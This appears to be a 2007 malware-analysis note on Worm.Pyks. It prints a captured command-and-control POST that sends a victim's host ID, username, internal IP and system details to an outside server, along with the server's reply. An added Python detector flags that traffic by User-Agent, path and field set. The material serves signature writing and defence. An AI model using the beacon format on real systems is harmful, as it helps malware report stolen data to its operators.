Worm.Pyks
Sample submitted anonymously; it was reportedly being pushed via Skype. It has an unusual C&C mechanism: HTTP based, but it pushes data in multipart form posts rather than in URL variables as we'd normally see. The posts carry a very distinctive User-Agent, and the sigs for now key only on that. Hopefully we'll find something else.
Below is a sample of the unusual C&C data push, followed by the server's reply:
POST /ucps.php HTTP/1.1
Host: 67.29.130.xxx
User-Agent: h9tslbw0
Content-type: multipart/form-data; boundary=---------------------------zsTM3KE6QiueEnyt
Content-Length: 1115
Connection: close

-----------------------------zsTM3KE6QiueEnyt
Content-Disposition: form-data; name="id"

HOME-KJZCRW7Q7Qxxxxxxxx
-----------------------------zsTM3KE6QiueEnyt
Content-Disposition: form-data; name="upt"

60
-----------------------------zsTM3KE6QiueEnyt
Content-Disposition: form-data; name="mode"

1
-----------------------------zsTM3KE6QiueEnyt
Content-Disposition: form-data; name="version"

2.3.1.0
-----------------------------zsTM3KE6QiueEnyt
Content-Disposition: form-data; name="cpu"

2211
-----------------------------zsTM3KE6QiueEnyt
Content-Disposition: form-data; name="ram"

256
-----------------------------zsTM3KE6QiueEnyt
Content-Disposition: form-data; name="os"

60
-----------------------------zsTM3KE6QiueEnyt
Content-Disposition: form-data; name="user"

victim
-----------------------------zsTM3KE6QiueEnyt
Content-Disposition: form-data; name="inip"

10.x.x.x
-----------------------------zsTM3KE6QiueEnyt
Content-Disposition: form-data; name="log"

#x:\xxxxx\pyks20070415212728#
=@64.22.77.xx@=
-----------------------------zsTM3KE6QiueEnyt--

HTTP/1.0 200 OK
Date: Sun, 15 Apr 2007 20:43:26 GMT
Server: Apache/2.0.54 (Fedora)
X-Powered-By: PHP/5.0.4
Content-Disposition: attachment; filename="a.exe"
Content-Length: 10
Content-Type: text/plain; charset=utf-8
Connection: close

Gi3V8u7JfH
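As an added example (not code from the original post or from the worm), the following Python reconstructs the check-in above from constructed copies of the captured request and reply, with the redactions kept as shown, parses the multipart body, and flags the request on the known User-Agent and on its structure (the fixed set of field names with integer counters), so a detection does not depend solely on the UA string. The reply check is likewise a heuristic of this example: an attachment named a.exe whose body has no MZ header and is served as text/plain. The path /ucps.php, the UA h9tslbw0, the field names and the boundary are taken from the capture; everything else (function names, the rule wording) is this example's own.

```python
"""Worm.Pyks check-in detector (added example; indicators read off the capture above)."""
import re

PYKS_UA = "h9tslbw0"
PYKS_PATH = "/ucps.php"
PYKS_FIELDS = {"id", "upt", "mode", "version", "cpu", "ram", "os",
               "user", "inip", "log"}

# Constructed reproduction of the captured request body (redactions kept).
BOUNDARY = "---------------------------zsTM3KE6QiueEnyt"
SAMPLE_FIELDS = [
    ("id", "HOME-KJZCRW7Q7Qxxxxxxxx"), ("upt", "60"), ("mode", "1"),
    ("version", "2.3.1.0"), ("cpu", "2211"), ("ram", "256"), ("os", "60"),
    ("user", "victim"), ("inip", "10.x.x.x"),
    ("log", "#x:\\xxxxx\\pyks20070415212728#\r\n=@64.22.77.xx@="),
]
# Constructed reproduction of the captured reply (Date header dropped).
SAMPLE_RESPONSE = (
    b"HTTP/1.0 200 OK\r\nServer: Apache/2.0.54 (Fedora)\r\n"
    b"X-Powered-By: PHP/5.0.4\r\n"
    b'Content-Disposition: attachment; filename="a.exe"\r\n'
    b"Content-Length: 10\r\nContent-Type: text/plain; charset=utf-8\r\n"
    b"Connection: close\r\n\r\nGi3V8u7JfH"
)


def build_request(fields=SAMPLE_FIELDS, ua=PYKS_UA, path=PYKS_PATH) -> bytes:
    """Assemble a multipart/form-data POST laid out like the sample."""
    body = b"".join(
        f'--{BOUNDARY}\r\nContent-Disposition: form-data; name="{n}"\r\n\r\n{v}\r\n'.encode()
        for n, v in fields
    ) + f"--{BOUNDARY}--\r\n".encode()
    head = (f"POST {path} HTTP/1.1\r\nHost: 67.29.130.xxx\r\nUser-Agent: {ua}\r\n"
            f"Content-type: multipart/form-data; boundary={BOUNDARY}\r\n"
            f"Content-Length: {len(body)}\r\nConnection: close\r\n\r\n")
    return head.encode() + body


def parse_http(raw: bytes):
    """Split a raw HTTP message into (start line, lower-cased header dict, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    start, *lines = head.decode("latin-1").split("\r\n")
    headers = {}
    for line in lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return start, headers, body


def parse_multipart(content_type: str, body: bytes) -> dict:
    """Minimal multipart/form-data parser for text parts: field name -> value."""
    m = re.search(r'boundary="?([^";]+)"?', content_type)
    if not m:
        raise ValueError("Content-Type carries no boundary parameter")
    delim = b"--" + m.group(1).encode()
    fields = {}
    for chunk in body.split(delim)[1:]:      # [0] is the preamble, empty here
        if chunk.startswith(b"--"):           # "--boundary--" closes the body
            break
        part_head, _, part_body = chunk.lstrip(b"\r\n").partition(b"\r\n\r\n")
        name = re.search(rb'name="([^"]*)"', part_head)
        if name is None:
            continue
        # The CRLF before the next delimiter belongs to the delimiter (RFC 2046).
        if part_body.endswith(b"\r\n"):
            part_body = part_body[:-2]
        fields[name.group(1).decode()] = part_body.decode("latin-1")
    return fields


def classify_request(raw: bytes) -> list:
    """Reasons a request looks like a Pyks check-in; empty list when it does not."""
    start, headers, body = parse_http(raw)
    method, path, _ = start.split(" ", 2)
    reasons = []
    if headers.get("user-agent") == PYKS_UA:
        reasons.append("known Pyks User-Agent")
    if path == PYKS_PATH:
        reasons.append("Pyks check-in path")
    ctype = headers.get("content-type", "")
    if method == "POST" and ctype.startswith("multipart/form-data"):
        fields = parse_multipart(ctype, body)
        # Structural rule that survives a UA change: the exact field set, with
        # the counters the sample shows as bare integers (heuristic of this example).
        if PYKS_FIELDS <= set(fields) and all(
                fields[k].isdigit() for k in ("upt", "mode", "cpu", "ram", "os")):
            reasons.append("Pyks check-in field set")
    return reasons


def classify_response(raw: bytes) -> list:
    """Reasons the reply looks odd: an .exe 'attachment' that is not a PE image."""
    _, headers, body = parse_http(raw)
    reasons = []
    fn = re.search(r'filename="?([^";]+)', headers.get("content-disposition", ""))
    if fn and fn.group(1).lower().endswith(".exe"):
        if not body.startswith(b"MZ"):
            reasons.append("attachment named .exe lacks a PE (MZ) header")
        if headers.get("content-type", "").startswith("text/plain"):
            reasons.append("attachment named .exe served as text/plain")
    return reasons


if __name__ == "__main__":
    print(classify_request(build_request()))
    print(classify_response(SAMPLE_RESPONSE))
```

The structural rule fires on the reconstructed sample even when the User-Agent is swapped for a browser string, which is the point: a signature on h9tslbw0 alone breaks the moment the author rebuilds with a new token, while the field set and the /ucps.php path are part of how the server side is written.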
More detail as we get it.
--
MattJonkman - 15 Apr 2007